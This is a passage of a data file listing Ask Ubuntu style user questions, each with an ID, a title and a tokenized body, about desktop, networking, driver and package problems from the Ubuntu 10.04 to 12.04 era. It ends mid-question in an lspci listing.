122774	only show a menu under unity	we want our app nitro to be more native on ubuntu . we 're going to do this by adding unity quicklist support & appmenu support . is it possible for the app to only utilize the app menu ? if the user is not using unity they wo n't get any menu bar . the only reason why we want the menu to be in the ubuntu version is for the sake of desktop integration .
122775	separate screen ati	i 'd like to have two separate screens ( one for desktop , one for running xbmc on tv ) . i have ati radeon 4850 : 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv770 [ radeon hd 4850 ] now it works with x autoconfiguration ( one big desktop - i have to move windowed xbmc to second screen and make it full screen with wmctrl ) . could you please help me with your working xorg.conf files which i could base my config on ? thanks in advance c
122781	how to change color for dialogue windows	i 've been having issues with my interface ( messed up colors , menus , and so on ) . i have deleted the .gnome folder , .gconf , .gconfd . some issues are still there especially with ambiance theme , i could get it fixed by installing some alternative ambiance themes ( ambiance-blue , ambiance-red , etc ) . the issue that i can not fix yet is the color of dialogue windows ' text . the background is grey , the text is white . where can i find such setting ?
122782	how can i assign a command to a key ?	i want to assign a special command to be executed when i press the f15 keyboard on a mac keyboard under ubuntu . this is the key on top of the pgup key on the aluminium keyboard for macs . i use that keyboard with linux and i love it . in this case , i would like the f15 key to suspend the pc . the command for this is : pmi action suspend
122783	how do i hide / remove a partition from the nautilus left panel ?	i have a luks setup with encrypted partition . and i do n't want everyone on my computer to see that i have such partition . unfortunately it shows up in the nautilus `` devices '' panel as `` encrypted partition '' . is there a way to prevent it from showing there ? i managed to setup authentication with usb key and i do n't want the encrypted partition show in the panel .
122784	how can i change the default save location the gnome3 screencast ?	how can i change the default save location the gnome3 screencast ? by default it saves on /home/video .
122787	white menu colour on ubuntu 12.04 live boot	i was playing with my new ubuntu 12.04 by live booting and i found the desktop right click menu has white color , but on the panel it turns black . i remember the last time i was using ubuntu 11.10 the menu color was black . is this some kind of 'bug ' on the live booting ? problem with contrast i guess ?
122791	why is apache running in the background ?	i did n't install apache . i also have ssh installed . do apache and ssh come by default with ubuntu ? i do have lampp but i thought i had kept it disabled . yet , i can see an apache initial page that shows that it 's working .
122798	unknown process when ending user session	this process sometimes shows up when shutting down and it never ends in cases its showing up . rarely but this comes up ubuntu netbook remix 10.04.03
122799	how to i enable jumbo frames on just one network interface ?	i have a server with a storage network which currently supports jumbo frames . i want to enable just eth1 to have that ability . what settings do i change and what is the best way to test the configuration ?
122807	non-executable ( nx ) memory warning on an hp proliant dl380 g5	i am getting the following warning message from a new installation of ubuntu 10.04 ( server version ) on an hp proliant dl380 g5 : your cpu appears to be lacking expected security protections . $ /usr/bin/check-bios-nx -- verbose gives me : '' this cpu is family 6 , model 15 , and has nx capabilities but is unable to use these protective features because the bios is configured to disable the capability '' and : $ grep ^flags /proc/cpuinfo | head -n1 | egrep -- color=auto ' ( pae|nx ) ' gives me : flags : fpu vme de pse tsc msr *pae* ... . the security/cpufeatures documentation here , states that , `` the first flags line will include nx if the bios is not disabling the cpu feature , and the cpu is actually nx-capable '' to summarize so far , `` nx '' is not shown in the flags line from /proc/cpuinfo , whilst `` pae '' , is ... is there any documentation available or is anyone able to recommend a procedure for installing the `` -server or -generic-pae flavor of the 32bit kernel '' ... and/or how to make the necessary adjustments to the bios . many thanks for putting up with this rather unwieldy question !
122808	sync google calendar tasks with evolution	i am running ubuntu 12.04 and prefer evolution to thunderbird as my mail manager and organiser . i run a gmail account and use the calendar a lot to organise future meetings , appointments and tasks.i have synced the calendar , contacts and meetings , but can not get tasks to sync . does anyone know how to do that ?
122812	are there any gtk3 themes that work properly in unity-2d ? all that i 've tried have `` button glitches ''	every gtk3 theme i 've ever tried other than ambiance or radiance has some `` fallback '' buttons when maximized instead of the theme buttons . is there a fix or a theme without this issue ? example :
122819	playonlinux wine error when run nfsu	i installed nfs underground with play on linux.at the program 's main page there is a label `` need for speed underground '' which is selected.i click run and wait.nothing happens.then i run on terminal : /usr/share/playonlinux/playonlinux -- run `` need for speed underground '' but i get the message : wine : can not find '' what is wrong ?
122820	how do i mange image placement in lyx ?	i am new to lyx and used the tutorial but i have never used latex before and i am struggling with image placement when creating documents . specifically do the images have to be of a certain quality , size or format . does lyx support tranparency . maybe there are too many questions here and ultimately i am looking for somekind of user manual . background : im using lyx because i am writing a book and want to present it in different formats ( e.g . final format , manuscript etc ) .
122821	firefox shows i have webserver running on http : //localhost:80 while other browser says `` could not connect to remote server ''	what the hell is this ? ! ! whats wrong with firefox ? ? ! ! intending to solve this issue i have deleted all my apache related programs from my system , though no problem is solved . im soo confused . why firefox showing this wrong message ? i have checked /var/www i have this folder as i had apache 2.2 . now i dont have any webserver though im seeing this message . this message is only dislayed when im trying firefox . no other browser ( opera , rekonq and chrome ) showing this , instead they are returning `` could not connect to localhost , '' which is normal message . i have tried to figure out whether i have any other instances of apache running or not using : $ ps a | grep apache and it rerturned `` command not found . '' how i can be sure where that application lies ? how can i stop it ? i dont know how much damage i already made to other programs . is there a way i can check all program dependencies and reinstall them ? ? i think i have deleted several dependent programs .
122823	how to install texlive 2011 ?	i 'm not quite sure whether the problem with my texlive installation is n't sitting in front of the computer but i just can not get it to work . the first thing i did was download the installer from the texlive homepage , run it and try the installation with all the options preselected . when i tried to install `` gummi '' ( latex editor ) from its ppa afterwards it was telling me it had some uninstalled dependencies ( mostly texlive 2009 packages from the ubuntu repositories ) . then i went back and started reading some more on the installation topic and there was a vague mentioning of having to set path for the installation . i could n't figure out how to do that so i found the option in the installer `` create symlinks in standard directories '' which i figured was an automated option of the path settings . now i tried to install gummi once more and it still came back with all the lacking dependencies . i figured i 'd try just installing it but now i 'm sitting there with a bowl of nothing - even the installation of 13 of the packages from the repositories failed with errors , for example : dpkg : dependency problems prevent configuration of texlive-latex-extra : texlive-latex-extra depends on texlive-pictures ( > = 2009-1 ) ; however : package texlive-pictures is not configured yet . texlive-latex-extra depends on texlive-latex-base ( > = 2009-1 ) ; however : package texlive-latex-base is not configured yet . now i 'm wondering where i went wrong and whether there is somebody who could give me a fool-proof explanation on how to install the 2011 texlive . unfortunately i could n't find a good explanation by raiding google . thanks hell of a lot in advance for any help on those matters best regards
122824	how to manually trigger ssh add dialog box ?	running ssh-add at the command line no longer unlocks the ssh keys properly on my system ( ubuntu 11.10 with unity ) . even after i 've run ssh-add , when i ssh to a server , i get a dialog box popping up to ask me for my ssh key passphrase . after that things work as expected . ssh-agent is running . when i first log in : $ ps -ef | grep ssh-agent mish 1853 1818 0 18:55 ? 00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/gnome-session -- session=ubuntu how can i unlock the ssh key properly without having to ssh to a server ? ( manually triggering the ssh key dialog window would be ok as a solution , but i do n't know how to do that ) . my use case is that i use tmuxinator and want to set up multiple ssh connections . so i want the ssh key unlocked . otherwise all the ssh key dialog boxes all pop up and i have to enter my passphrase multiple times . or i can ssh somewhere before launching tmuxinator , but the connection is slow here , so that just adds friction . so i want to unlock the ssh key before launching tmuxinator , without having to ssh somewhere first . edit just tried logging out and logging back in again . then i did : $ env | grep -i ssh ssh_agent_pid=8693 ssh_auth_sock=/tmp/keyring-ho4cfe/ssh $ ssh-add -d all identities removed . $ ssh-add -l 1024 b8:12:34:56 [ ... ] :19 name @ computer ( dsa ) $ ssh-add enter passphrase for /home/name/.ssh/id_dsa : identity added : /home/name/.ssh/id_dsa ( /home/mish/.ssh/id_dsa ) $ ssh-add -l 1024 b8:12:34:56 [ ... ] :19 /home/name/.ssh/id_dsa ( dsa ) 1024 b8:12:34:56 [ ... ] :19 name @ computer ( dsa ) 0 mish @ mishtop : ~ $ ssh server at which point i am again asked for my passphrase by the gui dialog box . frustrating ... it 's also interesting that after `` all identities removed '' that ssh-add -l still shows an identity . that confuses me . and there does only appear to be one ssh-agent running . edit 2 : i found a bug on launchpad about this : https : //bugs.launchpad.net/ubuntu/+source/openssh/+bug/841672 however this question was about finding a workaround rather than asking why it did n't work , so i hope the question can stand . edit 3 : nothing unusual in /etc/ssh/ssh_config - i have n't touched it . i do have a ~/.ssh/config but that is just ports and usernames . i watched what processes were running when the dialog popped up , and it was /usr/lib/gnome-keyring/gnome-keyring-prompt-3 , launched by /usr/bin/gnome-keyring-daemon -- daemonize -- login i tried launching the prompt from a terminal but nothing happened . so still stuck .
122830	how to set a text theme for plymouth ?	i have ubuntu 12.04 ( beta ) and i want to set a text theme for plymouth , because i need to read what commands the pc is running on shutdown ( because it freezes when i shutdown it ) , but the method i found googling ( how do i change the plymouth bootscreen ? ) is not working : this is the ouput of update-alternatives -- list default.plymouth : user @ host : ~ $ update-alternatives -- list default.plymouth /lib/plymouth/themes/solar/solar.plymouth /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth user @ host : ~ $ and the text themes are not displayed . how can i set a text theme for plymouth ?
122834	how to recover from the command could not be located because '/usr/bin ' is not included in the path environment variable . error ?	i added these lines to my .bashrc file : export vertx_home=/anto/vertx/bin export path= $ { path } : $ { vertx_home } /bin after doing that . i get an error message like that for all command 's i run , for example : clear , groovy : command 'clear ' is available in '/usr/bin/clear' the command could not be located because '/usr/bin ' is not included in the path environment variable . clear : command not found how to recover from it ? i 'm new to ubuntu . kindly help . thanks in advance .
122837	ubuntu boot problems	i installed ubuntu 11.10 using wubi on an old hp compaq nx7400 laptop . it has worked fine until recently , but now whenever i try to boot it freezes . i first get the usual boot screen , with the colored progress dots , but then it switches to a textual mode and stops ... the curser just blinks and blinks , nothing ever happens . i am wondering what the problem is and how i can fix it . note : i recently tried upgrading to 12.04 beta , but there was not enough space left on my hard drive .
122838	sshfs permissions problem -- need to be root to view some files	i 'm automounting sshfs shares using a script in /etc/network/if-up.d/ and entries in /etc/fstab . i have keys set up for my user so no password is required . my user ( 1000 ) has sudo rights on the server . ( user id 's are the same on both computers too . ) root login via ssh is not permitted on the server . i need to mount a directory and access the files in it as root . i 'm not sure how to do that with sshfs . i added allow_root , as shown below , but that did n't help . sshfs # user @ 192.168.1.1 : /owned_by_root /xyz/owned_by_root fuse comment=sshfs , noauto , nonempty , users , exec , uid=0 , gid=0 , allow_root , reconnect , transform_symlinks , batchmode=yes 0 0 i also tried uid=1000 and uid=0 . neither works as expected . with uid=1000 , the directory is mounted , but i can not view any files due to permissions ( even when i am root on my local machine ) . with uid=0 , i do n't think the directory is mounted at all ( probably because the key is for user 1000 ) . my question : how do i get behavior similar to nfs with no_root_squash where i can mount it in a way that allows me to browse files and subdirectories owned by root when i open a local file browser as root ?
122840	send maximized window to another workspace	this context menu : is available on right click only if window is not maximized . is there a way to do this when window is maximized ?
122841	why is 12.04 using a pae dependent kernel by default ?	recently when i was trying ubuntu 12.04 beta i got to know that it was using a pae kernel , but i am not sure of the reason . why has ubuntu shifted to pae kernel ? also is there a non pae version also available ?
122843	problems with wired network on acer aspire 1410	the problem is the following : i ca n't establish a wired connection on acer aspire 1410 with ubuntu 11.10 installed . wireless connection works fine . but when i plug the network cable and disable wifi nothing happens . here is my lspci lspci -nn | grep ethernet 130 01:00.0 ethernet controller [ 0200 ] : atheros communications ar8131 gigabit ethernet [ 1969:1063 ] ( rev c0 ) here is ifconfig eth0 eth0 link encap : ethernet hwaddr 00:11:22:33:44:55 up broadcast multicast mtu:1500 metric:1 rx packets:4293051801 errors:4283474320 dropped:4291136304 overruns:4293051800 frame:4294967295 tx packets:4293051800 errors:4287305312 dropped:0 overruns:4293051800 carrier:4294967295 collisions:4285389816 txqueuelen:1000 rx bytes:4293051800 ( 4.2 gb ) tx bytes:4293051800 ( 4.2 gb ) interrupt:46 i could't find any information on the internet . what is wrong with my wired connection . it seemed to work on earlier ubuntu versions . how can i solve the problem ? cat /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile no-auto-default=00:26:9e:59:63:2c , [ ifupdown ] managed=false cat /etc/network/interfaces auto lo iface lo inet loopback
122855	we have a few web servers , how should we reason regarding upgrades to new versions ?	we run a saas business today , all servers run ubuntu server and usually a lamp stack on top of that . we are reasearching a little bit how we should upgrades our servers . one option is to stay on lts 10.04 which we run today until it 's about to run out and then go to the next lts , the other option is to upgrade to all intermediate versions between lts as soon as they are released . what are the pros/cons , are there any other ways ? how do enterprises usually do ? are there any downsides to performing an upgrade rather than going to clean installs every time ? we 'd like to benefit of the major version upgrades of mysql / apache / php etc even if it might take some extra compability work to verify everything .
122856	do n't want to suspend when closing lid	it 's a dell d630 . installed 12.04 . i 'm using an external monitor , so i 'd like to close the lid and have it continue to work . however , regardless of what i put in the power management option , it insists in suspending when i close the lid . any ideas ?
122857	can i copy large files faster without using the file cache ?	after adding the preload package , my applications seem to speed up but if i copy a large file , the file cache grows by more than double the size of the file . by transferring a single 3-4 gb virtualbox image or video file to an external drive , this huge cache seems to remove all the preloaded applications from memory , leading to increased load times and general performance drops . is there a way to copy large , multi-gigabyte files without caching them ( i.e . bypassing the file cache ) ? or a way to whitelist or blacklist specific folders from being cached ?
122861	how to make apache tomcat comes with netbeans installation work ?	i have installed the `` apache tomcat '' server came with netbeans along with glassfish server . now how can i deploy php application on it ? how should i configure it ? the default directory of apache tomcat is : /usr/local/apache-tomcat-7.0.22 i have given full r/w permission to it . in netbeans there is a home path setting which is set : /usr/local/apache-tomcat-7.0.22 and a base path , which points to a void folder at my home directory . how i configure netbeans so that it can start and shutdown tomcat automatically ? i have checked that i can maunally start tomcat and deploy application by copying apps to /usr/local/apache-tomcat-7.0.22/webapps directory . but all these needs manual labour . how can i configure netbeans so that i dont have to do these manual steps ? how i should run applications ?
122862	replace system beep with a pleasant sound ?	is it possible to replace system beep with some pleasant sound ? i like having the terminal alert me with a sound rather than a window flash . i prefer to have a pleasant sound because disabling the beep means missing the command completion and its output on terminal . i prefer to do this using configuration files rather than gui .
122872	how do i sync contacts on my iphone to ubuntu-one ?	when i open the u1 iphone app the only options i have are to upload photos . i do n't have any music on my phone but would like to sync my contacts . any help please ?
122877	can not install ubuntu	i have tried many times to install ubuntu , each time that i do i get an error stating that , can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing .
122880	script ( .sh ) will not terminate	i have a script file ( start-conky.sh ) . it executes correctly , but when i do a `` ps -u `` it shows as still a pid , which i 'm assuming means it is still in memory . unless i do a `` kill `` it just stays there . it is not causing any problem . i 'm just curious as to how to get the script to terminate after it executes . i 've listed the script below . i really do n't know that much about writing programs , so i 'm sure there are mistakes . can anyone help ? title : start-conky.sh `` the title is just listed here it is not in the script '' # ! /bin/bash conky -c ~/conky/scripts/config1 & conky -c ~/conky/scripts/config2 exit
122884	what low latency live streaming solutions exist for low bandwidth connections	in a couple of weeks in my country there will be a open source event ( flisol ) and the group is trying to figure out how to stream the event live with a slow connection . what options are in ubuntu that can help in streaming the live event with a low speed device over the internet . the internet speeds vary between 8kb/s up to 40kb/s and we want a way to have low latency without sacrificing a lot of quality . since the event will be on the 28th and 12.04 will come out on the 26th . the version of ubuntu that will be used will be 12.04 .
122889	flash player wo n't start after ubuntu update	very new on linux as well on ubuntu . i have install in my pc the ubuntu 11.10 and after a regular ubuntu update , the flash player can not start . i have uninstall the flash player several times to tryother versions of the flash but still the flash can not start in my browsers ( i use both firefox and chrome ) . note that i install the flash player with browsers closed .
122893	highlighting to copy with terminal	i 'm wondering if there is a terminal enhancement , or a way to make the terminal to where when i highlight over anything it auto copies whatever i highlight . i know this is a feature in some terminal text editors ( like grep or vi ) , but was wondering if there is compatibility somehow in the terminal itself . any help would be greatly appreciated .
122898	does evince ( document viewer ) have a plug-in system ?	does it have api ? if not , whats the simplest pdf viewer that does ? what i do want to create : maybe annotations ( which could be shared via an external file ) or creating hyper links to wikipedia . that sort of thing . you could even have remote control where the viewer could sync many open documents across different computers all at once . not sure yet .
122899	is there a cli webcam image grabber that works with a video4linux2 device ?	i 've tried everything in apt-cache search webcam |sort -u and everything has some problem . correcting any syntax mistakes , showing how to use a `` gui only '' from the cli or a good ffmpeg/mencoder/vlc one-liner would answer my question . or since i know how to make ffmpeg take a short mjpeg , showing how to strip off the first jpeg would work , i guess . still , this ought to be more straightforward than that . $ camgrab /dev/video0 : no v4l device ( camgrab probably does n't handle v4l2 ) $ fswebcam -- list-inputs -- - opening /dev/video0 ... trying source module v4l2 ... /dev/video0 opened . -- - available inputs : 0 : camera 1 no input was specified , using the first . adjusting resolution from 384x288 to 352x288 . -- - capturing frame ... premature end of jpeg file captured frame in 0.00 seconds . -- - processing captured image ... there are unsaved changes to the image . $ fswebcam -- input 0 boo.jpg -- - opening /dev/video0 ... trying source module v4l2 ... /dev/video0 opened.jjjjjjjjj adjusting resolution from 384x288 to 352x288 . -- - capturing frame ... premature end of jpeg file captured frame in 0.00 seconds . -- - processing captured image ... writing jpeg image to 'boo.jpg ' . produces this $ motion is beyond me . $ uvccapture -oboo.jpg $ file boo.jpg boo.jpg : data $ qiv -t boo.jpg unable to read file : failed to load image 'boo.jpg ' : error interpreting jpeg image file ( not a jpeg file : starts with 0x8f 0x5a ) not really an image . $ /usr/bin/vgrabbj -d /dev/video0 -f boo.jpg could not open configfile /usr/etc/vgrabbj.conf , ignoring reading image from /dev/video0 produces this $ webcamd rtfm , missing template ( /home/ $ user/.webcamd/index_up.html ) $ man webcamd |cat webcamd ( 1 ) webcamd ( 1 ) name webcamd - take a image from your webcam synopsis webcamd [ start | stop | refresh ] description this manual page documents briefly the webcamd daemon . this manual page was written for the debian distribution because the original proâ gram does not have a manual page . webcamd is a program that take images from your webcam and put it on a ftp server on a local ( web ) directory options start start the daemon . stop stop the daemon . refresh take a shot ! author this manual page was written by julien danjou < acid @ debian.org > for the debian system ( but may be used by others ) . permission is granted to copy , distribute and/or modify this document under the terms of the gnu free documentation license , version 1.1 or any later version published by the free software foundation ; with no invariant sections , no front-cover texts and no back-cover texts . 2002 april 21 webcamd ( 1 ) $ webcamd start rtfm , missing template ( /home/ $ user/.webcamd/index_up.html ) $ webcamd refresh rtfm , missing template ( /home/ $ user/.webcamd/index_up.html ) webcam seems to demand that i set a config file to ftp the images somewhere and seems to do nothing by default $ /usr/bin/webcam reading config file : /home/ $ user/.webcamrc video4linux webcam v1.5 - ( c ) 1998-2002 gerd knorr grabber config : size 320x240 [ none ] input ( null ) , norm ( null ) , jpeg quality 75 rotate=0 , top=0 , left=0 , bottom=240 , right=320 gui only camorama cheese kamoso luvcview
122901	can i resize unity panel height in 12.04 ?	i want to know if there 's a new possibility to adjust unity top panel in 12.04 . since bug https : //bugs.launchpad.net/unity/+bug/928544 seems to be fixed , where can we find the constant : panel_height and assign it a new value ? one can reduce default font size and icons size but no way for the to panel . it 's not in the css but i suspect it to be hard coded in unityshell . possible duplicate : how to resize the top panel in unity ?
122903	how to allow key functions while desktop locked	is it possible to allow a keyboard 's volume keys to continue working when your desktop is locked ? currently , the default behavior disables all special-function keys until the desktop 's unlocked . i like to use my pc as a music player and leave it locked when i 'm not directly at the console , but i still want to let people to control the volume if a song 's too loud .
122906	modprobe.conf options not loaded on startup	bit of a n00b still with linux , but getting there ... anyway , i 've put a new install of ubuntu 11 on an old p4 pc of mine i was hoping to give away and i 'm having a little trouble with the on-board intel 100/pro ve network adapter , but i thought i 'd cracked it . after startup i run `` dmesg | grep e100 '' to see what the kernel makes of the driver and get this : [ 1.756219 ] pci 0000:02:08.0 : firmware left e100 interrupts enabled ; disabling [ 3.237229 ] e100 : intel ( r ) pro/100 network driver , 3.5.24-k2-napi [ 3.237235 ] e100 : copyright ( c ) 1999-2006 intel corporation [ 3.237310 ] e100 0000:02:08.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 [ 3.259916 ] e100 0000:02:08.0 : ( unregistered net_device ) : eeprom corrupted [ 3.277707 ] e100 0000:02:08.0 : pci int a disabled [ 3.277735 ] e100 : probe of 0000:02:08.0 failed with error -11 so i found out that by running the following i can make the driver load : sudo modprobe -r e100 sudo modprobe e100 eeprom_bad_csum_allow=1 it loads and the adapter works great . however i do n't want to next user to have to run that every-time they start the pc . so i learned that putting the option into a .conf file in the /etc/modprobe.d folder should set the option everytime it 's loaded . i created the following file in /etc/modprobe.d : -rw-r -- r -- 1 root root 37 2012-04-16 21:18 e100.conf and gave it the contents : options e100 eeprom_bad_csum_allow=1 and restarted the machine . when it comes up the network is not working and looking at dmesg | grep e100 has the same message i had at the start . running `` sudo modprobe -r e100 '' then `` sudo modprobe e100 '' ( without the options specified ) makes it load great , so it does seem to use the e100.conf file . why does n't it use it on startup ? much appreciate any help , sorry it 's so long but hope i 've explained myself well . cheers , chris .
122908	folding @ home missing dependency for libssl.so.1.0.0 et alii	i 'm trying to run f @ h on my maverick machine . i 've downloaded and installed the three .deb files from their official download page ( fahclient_7.1.52_i386.deb , fahcontrol_7.1.52-1_all.deb and fahviewer_7.1.52_i386.deb ) . sadly , it seems like fahclient has some missing dependencies : $ fahclient fahclient : error while loading shared libraries : libssl.so.1.0.0 : can not open shared object file : no such file or directory $ ldd /usr/bin/fahclient /usr/bin/fahclient : /usr/lib/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found ( required by /usr/bin/fahclient ) linux-gate.so.1 = > ( 0xb78d4000 ) libpthread.so.0 = > /lib/libpthread.so.0 ( 0xb789e000 ) libssl.so.1.0.0 = > not found libcrypto.so.1.0.0 = > not found libdl.so.2 = > /lib/libdl.so.2 ( 0xb7899000 ) libexpat.so.1 = > /lib/libexpat.so.1 ( 0xb7872000 ) libz.so.1 = > /lib/libz.so.1 ( 0xb785d000 ) libbz2.so.1.0 = > /lib/libbz2.so.1.0 ( 0xb784b000 ) libstdc++.so.6 = > /usr/lib/libstdc++.so.6 ( 0xb775f000 ) libm.so.6 = > /lib/libm.so.6 ( 0xb7739000 ) libgcc_s.so.1 = > /lib/libgcc_s.so.1 ( 0xb771d000 ) libc.so.6 = > /lib/libc.so.6 ( 0xb75c0000 ) /lib/ld-linux.so.2 ( 0xb78d5000 ) is there a way to satisfy these dependencies with minimum impact on the rest of the system ( something like this perhaps ) ? or is my only alternative to try an older version of the client ?
122909	battery life low on notebook using ubuntu 11.10 vs. windows 7	im using a brand new dell xps notebook ( bought mar 2012 ) which has 4.5 hrs battery life using a 6 cell battery-when i use windows 7 . the machine uses an intel core 17 2670qm processor , and a 64 bit operating system . i downloaded ubuntu 11.10 and installed it on a usb drive , which is how i use it . i still have windows 7 on the machine . when the machine is booting up i hit f12 , and run ubuntu from the flash drive instead of the machine booting windows , as it normally would . on the ubuntu menu , on the top right area , there is a battery menu , which shows how long to charge battery , or how much life left etc..with a fully charged battery the most ubuntu will give me is 1.5 hrs . i 've adjusted all power setting etc by clicking on the battery meter where i can make these adjustments , and have even turned down the brightness on the monitor . i 've read through these questions here , and a user wrote to install ubuntu 12 ( ? ) ( the alpha version ) when it 's out this month ( april ) , and this has better power management . other forums ( ubuntu wiki ) state that windows 7 controls power management effectively because it 's configured to work with the hardware . i 'd like to install ubuntu and wipe windows but ca n't because of this issue . i need my notebook to go hours , not an hour and a bit . can anybody recommend possibly a good software to use , that will work with the machines bios under ubuntu ? another thought of mine , is- since i did n't yet wipe windows off my hard disk , is windows still possibly controlling the power mgmt aspect on the machine ? i 've thought of calling tech support at dell and asking for help there , maybe dell has something ( a tweak ? ) , i can download that 'll work under ubuntu . looking forward to any help/suggestions i can get here , i 'm really stuck on this..
122922	how do i log into gnome as a root ?	i 've enabled the root account by setting a password for it but not matter what i try i cant log into any de but the default unity one , while any other user ( but root ) can choose any de
122927	re-streaming tv to ipad	i use `` air video server '' ( and `` air video client '' ) to stream videos from my computer to my ipad . recently i found tv-maxe ( which is a sopcast client , i guess ) for watching tv on ubuntu . is there a way to re-stream from my ubuntu to the ipad using these two apps , or possibly some other apps ? thanks !
122930	how can i make firefox open magnet-links in transmission ?	i ca n't find out how to make firefox open magnet-links in transmission . there is no option to make it the standard program for magnet-links in its properties , and as i am not experienced with the filesystem so i ca n't add it as the standard program in firefox either .
122932	ubuntu code of conduct updated – should i ?	i signed the ubuntu code of conduct a good while back . i do n't remember exactly when , and launchpad does n't tell me which version it is i 've signed . now there is a new version in the works . should i sign the new one ? does it have any practical consequences either way ?
122933	dell studio 1569 can not shutdown in ubuntu 11.10 or 12.04	i have not tried a version of ubuntu prior to 11.10 on my machine . the laptop will not shut down or restart . shutting down causes it to pause at `` will now halt '' , where upon it sits until the battery dies . restarting causes a similar problem , the machine never completely turns off . the screen is still on , the hard drive continues to run , everything is still on . it is a similar problem to an unresolved issue posted over at the ubuntu forums : http : //ubuntuforums.org/showthread.php ? t=1951446
122935	how to recover 1 specific partition using live cd ( usb ) ?	so i have somehow managed to delete my ubuntu partition . i think it may have been windows system restore that deleted it . below is a screenshot of gparted run via a live usb copy of ubuntu . that big 59.64 gib of unallocated space ? that used to be my ubuntu partition . is there any way i can easily recover just that partition ? ( assuming that the data is still there , which i think it is ) . i believe it was ext 4 , and it was running ubuntu 12.04 if that makes any difference .
122937	ubuntu precise 12.04 and 11.10 do not halt the computer completely , but 10.04 lts does ( asus p5g41t-m )	i am using an asus p5g41t-m motherboard with core 2 duo e5300 . i have tried ubuntu 12.04 beta 2 , the latest daily build of 12.04 and 11.10 ( the latest official ) , both of which act in the following strange way : when shutting down ( using shutdown -h 0 , halt ) they get to a point where the splash screen dots are visible , but nothing more happens and the computer does n't power off . shutdown -p 0 works , halt and shutdown -h do not . i 've tried 10.04.4 lts and it does behave correctly . using the newer releases , i 've tried adding acpi=off and acpi=force to the kernel parameters followed by update-grub , but that did n't help . any suggestions ?
122939	unable to locate package openal	after this command sudo apt-get install openal i got this message : e : unable to locate package openal
122940	how can i access my windows partition as an ordinary user ?	i have a dual boot laptop with win7 and ubuntu 11.10 . since few days my ubuntu does not mount automatically the win partition or a usb drive . it 's also not possible to change the desktop wallpaper . i `` fixed '' the win partition by hand modifying /etc/fstab . i also played a bit and now ubuntu mount the usb drive . on the other hand i can not unmount them because umount : only root can unmount uuid=521832f21832d4a7 from /media/windows but my account is admin , so i do not understand why i have this message . if i unmount with sudo from terminal there is no problem . for the wallpaper i have no error message but i ca n't change anything . i also tried to assign my account to `` normal '' user group and then back to admin group : useless . i believe that even if my account is administrator there is something messed up with permissions . few days ago a guest played a bit with my account and the standard guest user ( he could n't unlock as he forgot the password ) . i do n't know if this could be the cause , but at the moment i do n't understand what it could be . thank you for your help
122942	how to deal with wpa_supplicant error ?	i 'm using ubuntu 11.10 and i 've copied the wpa_supplicant configs from another computer running ubuntu 11.10 , which is connected to my home network . the non-connecting device has an intel wireless card which uses the ipw2100 driver and the wireless interface is called eth1 . issuing the iwlist scanning command shows that the card can see my network ssid ( along with several others ) . however , when i run the command : wpa_supplicant -dwext -ieth1 -c/etc/wpa_supplicant.conf i get the error message : wpa_supplicant ioctl [ siocsiwencodeext ] : invalid argument any guidance on explaining this error and help in getting wpa_supplicant to work giving me connectivity to my home network would be greatly appreciated .
122950	how do i close adobe acrobat from within terminal ?	i am writing a shell script in which i must close adobe acrobat . what command should i use ?
122952	hp laserjet professional p1566 usb printer is n't printing	i have installed the printer and it says its all fine . when i go to print something it says printing and then finished etc . but doesnt actually print at all . no idea what to do and if you need extra info let me know .
122955	ssh not working from outside network	ok.. first off my isp does not block ports . i run web server just fine from another machine . i have port forwarded port 22 . i can access within network but not out of.. i.e . my android . i get `` the operation timed out '' on connectbot . oh and i have allowed 22 on ufw . to answer what exactly happened was my isp blocks port 22 , even though a while back they told me they do not block any ports.. i changed it to port 27 and it worked without a problem .
122965	broadcom bcm4311 wireless not working on an hp pavilion dv2000	i 've been trying for some time now to make my wireless work again in ubuntu 11.10 , though it worked in 10.04 before i installed the several upgrades to this current version . i 've been on the forums , and have made sure i have no soft or hard blocks , un-blacklisted bcm43xx drivers , removed the proprietary broadcom sta drivers , and installed the b43 ones , but that still has n't helped . i 've tried many different solutions , but nothing seems to work . my lspci output is below . 00:00.0 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6150 ] ( rev a2 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g 